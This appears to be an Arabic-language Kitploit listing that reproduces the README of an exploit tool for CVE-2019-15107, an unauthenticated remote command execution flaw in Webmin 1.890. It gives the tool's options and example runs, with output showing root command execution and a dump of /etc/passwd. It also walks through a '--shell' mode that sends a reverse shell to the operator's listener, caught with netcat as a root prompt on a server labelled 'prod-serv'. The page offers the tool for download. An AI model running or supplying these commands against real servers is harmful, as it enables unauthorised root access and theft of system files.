Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nasrallahbaadi/cve-2019-15107
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubnasrallahbaadi/cve-2019-15107

CVE-2019-15107

CVE-2019-15107 Webmin ثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة

عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-15107 Webmin 1.890 تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة

تم تصميم هذا السكريبت لاستغلال ثغرة تنفيذ الأوامر بدون مصادقة في Webmin 1.890. يتيح لك تنفيذ أوامر عشوائية على خادم Webmin الهدف أو الحصول على شل عكسي.

الاستخدام

يأخذ الاستغلال 5 وسائط:

root@kitploit:~
$ python3 test.py -h                       
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]

Exploit unauthenticated command execution in Webmin 1.890.

options:
  -h, --help            show this help message and exit

required arguments:
  -i IP Address, --ip IP Address
                        Target ip address

optional arguments:
  -p Port number, --port Port number
                        Webmin port(default=10000)
  -c Command, --command Command
                        OS Command to execute (Default=id)
  --shell               Get a reverse shell
  -x, --proxy           Sends requests through Burp Suite proxy at 127.0.0.1:8080.

Example:
    python exploit.py -i 192.168.1.100
    python exploit.py -i 192.168.1.100 -p 10000 -c whoami
    python exploit.py -i 192.168.1.100 -x -c "ls -la"
    python exploit.py -i 192.168.1.100 --shell

الخيار الوحيد المطلوب هو -i وهو عنوان IP الخاص بالهدف.

تشغيل الاستغلال باستخدام -i فقط سينفّذ الأمر id على هدف موجود على المنفذ 10000

root@kitploit:~
$ python3 exploit.py -i 10.200.105.200 
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

تنفيذ الأوامر

يمكنك تحديد الأمر الذي تريد تشغيله باستخدام الخيار -c أو --command:

root@kitploit:~
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]

شل عكسي

يمكنك أيضًا الحصول على شل عكسي باستخدام الخيار --shell.

سيُطلب منك إدخال عنوان IP الخاص بك ومنفذ الاستماع:

root@kitploit:~
$ python3 exploit.py -i 10.200.105.200 --shell 
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
root@kitploit:~
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]# 

البروكسي

بإضافة الخيار -x أو --proxy يمكنك إرسال الطلب عبر بروكسي Burp على 127.0.0.1:8080

المراجع

https://nvd.nist.gov/vuln/detail/cve-2019-15107

تنزيل الأداة